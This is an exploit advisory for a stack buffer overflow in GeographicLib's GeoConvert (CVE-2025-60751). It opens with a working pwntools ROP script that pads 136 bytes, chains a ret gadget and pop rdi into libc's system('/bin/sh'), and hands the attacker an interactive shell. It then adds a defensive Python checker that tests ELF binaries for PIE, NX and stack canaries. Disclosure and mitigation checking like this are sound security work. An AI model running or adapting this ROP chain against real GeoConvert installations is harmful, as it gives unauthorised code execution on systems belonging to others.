Exploit title: GeographicLib v2.5.1 - stack buffer overflow
Date of discovery: 20 August 2025
Exploit Author: Me zer0matt (Rosario Matteo Grammatico)
<https://github.com/zer0matt>
Vendor homepage: https://github.com/geographiclib/
Software link: https://github.com/geographiclib/geographiclib
Affected version: GeographicLib <= v2.5.1
Tested on: Kali Linux 6.12.25-amd64 (Virtual Machine)
CVE id: CVE-2025-60751
Github issue: https://github.com/geographiclib/geographiclib/issues/43
Exploit repository: https://github.com/zer0matt/CVE-2025-60751
Blog post: https://zer0matt.github.io/CVE-2025-60751/

from pwn import *

# --- INITIAL CONFIG ---
binary_path = "./GeoConvert"
elf = ELF(binary_path)
context.binary = elf
context.arch = 'amd64'

# --- REPLACE THE ADDRESSES WITH YOUR OWN ONES ---
# Gadget and libc addresses below are specific to the tested build and environment.
pop_rdi = 0x000055555558BEFD
ret_gadget = 0x000055555558A016
system_addr = 0x7ffff7a5d110
binsh_addr = 0x7ffff7bb1ea4
exit_addr = 0x7ffff7a4c340

# --- PAYLOAD ---
offset = 136                      # padding up to the saved return address
payload = b"A" * offset
payload += p64(ret_gadget)        # stack align
payload += p64(pop_rdi)           # pop rdi; ret
payload += p64(binsh_addr)        # "/bin/sh" address
payload += p64(system_addr)       # system("/bin/sh")
payload += p64(exit_addr)         # exit

io = process(binary_path, env={"ASAN_OPTIONS": "detect_stack_use_after_return=1"})
io.sendline(payload)
io.interactive()
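
The chain above overwrites the saved return address and returns into a ret gadget, pop rdi and libc's system(). The process-level mitigations a defender should verify on any GeoConvert build are the ones that make exactly that harder: stack canaries (-fstack-protector, visible as a reference to __stack_chk_fail), a non-executable stack (NX, from the PT_GNU_STACK program header) and PIE (ET_DYN), so that ASLR randomises the code and libc addresses instead of leaving them fixed as in the script. The following checker is an added example, not part of this advisory or of the GeographicLib project; it parses the ELF64 header and program headers directly (no pwntools needed) and assumes a little-endian x86-64 ELF. The sample images it builds for its own run are constructed in the script and are not GeoConvert.

```python
import struct

# Constructed example: minimal ELF64 images are built in this script so the
# checker can run offline; these bytes are NOT taken from GeographicLib's GeoConvert.

ET_EXEC, ET_DYN = 2, 3
EM_X86_64 = 62
PT_GNU_STACK = 0x6474E551
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4
EHDR_SIZE, PHDR_SIZE = 64, 56


def check_hardening(data: bytes) -> dict:
    """Return which stack-overflow mitigations a little-endian ELF64 image carries.

    pie:    e_type == ET_DYN, so the image is loaded at a randomised base under ASLR.
    nx:     a PT_GNU_STACK program header without PF_X, so the stack is not executable.
    canary: '__stack_chk_fail' is referenced, i.e. the build uses -fstack-protector
            (heuristic: the same import-based test checksec-style tools use).
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    e_type, = struct.unpack_from("<H", data, 16)
    e_phoff, = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)

    nx = False  # no PT_GNU_STACK header means the loader grants an executable stack
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
    return {
        "pie": e_type == ET_DYN,
        "nx": nx,
        "canary": b"__stack_chk_fail" in data,
    }


def build_sample_elf(pie: bool, nx: bool, canary: bool) -> bytes:
    """Construct a header-only ELF64 image with the requested properties (test input only)."""
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELF64, little-endian, v1
    phnum = 1
    ehdr = e_ident + struct.pack(
        "<HHIQQQIHHHHHH",
        ET_DYN if pie else ET_EXEC,   # e_type
        EM_X86_64,                    # e_machine
        1,                            # e_version
        0,                            # e_entry
        EHDR_SIZE,                    # e_phoff: program headers follow the ELF header
        0,                            # e_shoff
        0,                            # e_flags
        EHDR_SIZE, PHDR_SIZE, phnum,  # e_ehsize, e_phentsize, e_phnum
        0, 0, 0,                      # e_shentsize, e_shnum, e_shstrndx
    )
    flags = PF_R | PF_W | (0 if nx else PF_X)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, flags, 0, 0, 0, 0, 0, 16)
    tail = b"__stack_chk_fail\x00" if canary else b"__cxa_finalize\x00"
    return ehdr + phdr + tail


def report(path: str) -> dict:
    """Read a real binary (for example a GeoConvert build) and return its mitigation status."""
    with open(path, "rb") as f:
        return check_hardening(f.read())


if __name__ == "__main__":
    import sys
    # Usage: python check_hardening.py ./GeoConvert   (falls back to the constructed sample)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    result = report(target) if target else check_hardening(build_sample_elf(True, True, True))
    for name, enabled in result.items():
        print(f"{name:7s} {'enabled' if enabled else 'MISSING'}")
```

Run it against the GeoConvert binary you actually deploy; a result with any of the three reported as MISSING means the build lacks a mitigation that the overflow above would otherwise have to defeat. The PIE test is the usual ET_DYN heuristic, so a shared library also reports pie as true.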